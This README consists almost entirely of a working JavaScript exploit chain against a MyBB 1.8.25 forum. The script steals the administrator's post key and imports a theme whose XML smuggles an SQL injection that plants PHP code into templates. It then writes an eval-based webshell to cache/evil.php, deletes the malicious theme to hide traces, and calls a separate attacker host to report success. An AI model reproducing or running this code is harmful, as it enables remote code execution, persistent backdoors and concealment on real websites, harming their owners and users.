README.md
Rendering markdown...
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825'
var attack_url = 'http://192.168.92.165:8080/attack_success'
var my_post_key = ''
var source_theme = '';
var evil_theme_set = ''
var evil_theme_tid = ''
function sleep (time) {
return new Promise((resolve) => setTimeout(resolve, time));
}
function get_themes(){
var url = bashurl + '/admin/index.php?module=style'
var xhr=new XMLHttpRequest();
xhr.open('GET',url,false);
xhr.onreadystatechange=function(){
// readyState == 4说明请求已完成
if(xhr.readyState==4){
if(xhr.status==200 || xhr.status==304){
var res = xhr.responseText;
var parser = new DOMParser();
var doc3 = parser.parseFromString(res, "text/html");
var source_theme_tid = '';
imgs = doc3.getElementsByTagName("img");
for(var i=0;i<imgs.length;i++){
if(imgs[i].alt == 'Default Theme'){
source_theme_tid = imgs[i]
break
}
}
source_theme_tid = source_theme_tid.parentNode.nextElementSibling.firstElementChild.firstElementChild
source_theme_tid = source_theme_tid.href.split('tid=')[1]
//get my post key
var postKey = doc3.getElementById('welcome').lastElementChild
my_post_key = postKey.href.split('my_post_key=')[1]
//reset url
source_theme = bashurl + '/admin/index.php?module=style-themes&action=set_default&tid=' + source_theme_tid + '&my_post_key=' + my_post_key
}
}
}
xhr.send();
}
function import_xml(){
var formData = new FormData();
var url = bashurl + '/admin/index.php?module=style-themes&action=import'
formData.append("my_post_key", my_post_key);
formData.append("import", 0);
formData.append("url", "");
formData.append("tid", "1");
formData.append("name", "evilTheme1");
formData.append("import_stylesheets", "1");
formData.append("import_templates", "1");
// JavaScript file-like object
var content = [
'<?xml version="1.0" encoding="UTF-8"?>',
'<theme name="Default" version="1825">',
'<properties>',
'<templateset><![CDATA[999\') and 1=2 union select \'header_welcomeblock_member_user\',\'${file_put_contents($_GET[0],$_GET[1])};\' union select \'header_welcomeblock_member_admin\',\'${file_put_contents($_GET[0],$_GET[1])};\' union select \'header_welcomeblock_guest_login_modal\',\'${file_put_contents($_GET[0],$_GET[1])};\'#]]></templateset>',
'<imgdir><![CDATA[images]]></imgdir>',
'<logo><![CDATA[images/logo.png]]></logo>',
'<tablespace><![CDATA[5]]></tablespace>',
'<borderwidth><![CDATA[0]]></borderwidth>',
'<editortheme><![CDATA[mybb.css]]></editortheme>',
'<disporder></disporder>',
'<colors></colors>',
'</properties>',
'<stylesheets>',
'<stylesheet name="color_black.css" attachedto="black" version="1825">',
'</stylesheet>',
'</stylesheets>',
'<templates>',
'</templates>',
'</theme>'
].join('\n');
var blob = new Blob([content], { type: "text/xml"});
formData.append("local_file", blob);
var request = new XMLHttpRequest();
request.open("POST", url);
request.send(formData);
}
function set_evil_theme(){
var url = bashurl + '/admin/index.php?module=style'
var xhr=new XMLHttpRequest();
xhr.open('GET',url,false);
xhr.onreadystatechange=function(){
// readyState == 4说明请求已完成
if(xhr.readyState==4){
if(xhr.status==200 || xhr.status==304){
var res = xhr.responseText;
var evil_theme = '';
var parser = new DOMParser();
var doc3 = parser.parseFromString(res, "text/html");
aTag = doc3.getElementsByTagName("a")
for(var i=0;i<aTag.length;i++){
if(aTag[i].innerHTML == 'evilTheme1'){
evil_theme = aTag[i]
break
}
}
//get set url
evil_theme_set = evil_theme.parentNode.parentNode.previousElementSibling.firstElementChild.href
evil_theme_set = evil_theme_set.replace('index.php','admin/index.php')
console.log('evil_theme_set: ' + evil_theme_set)
//get delete url
evil_theme_tid = evil_theme.href.split('tid=')[1]
console.log('evil_theme_tid: ' + evil_theme_tid)
}
}
}
xhr.send();
// set default thme
var xhr2=new XMLHttpRequest();
xhr2.open('GET',evil_theme_set,false);
xhr2.send();
}
function trigger_rce(){
// set default thme
var xhr=new XMLHttpRequest();
xhr.open('GET',bashurl + '/index.php?0=cache/evil.php&1=<?php eval($_GET[100]);?>',false);
xhr.send();
}
function clean(){
// reset default theme
var xhr1=new XMLHttpRequest();
xhr1.open('GET',source_theme,false);
xhr1.send();
var xhr2 = new XMLHttpRequest();
var formData = new FormData();
var url = bashurl + '/admin/index.php?module=style-themes&action=delete&tid=' + evil_theme_tid
formData.append("my_post_key", my_post_key);
xhr2.open("POST", url);
xhr2.send(formData);
}
function notice_attack(){
var xhr1=new XMLHttpRequest();
xhr1.open('GET',attack_url,false);
xhr1.send();
}
get_themes()
if(my_post_key != ''){
import_xml()
sleep(300).then(() => {
set_evil_theme()
trigger_rce()
clean()
notice_attack()
})
}